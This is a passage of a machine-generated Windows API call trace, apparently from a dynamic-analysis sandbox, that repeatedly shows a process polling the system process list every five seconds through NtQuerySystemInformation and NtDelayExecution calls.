NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.313] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.320] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.323] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.327] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.335] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.337] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.349] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.350] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.352] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.358] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.365] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.366] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.367] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.371] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.380] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.387] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.395] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.396] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.401] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.409] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.418] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.424] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.432] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.439] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.441] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.445] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.453] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.460] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.468] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.469] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, 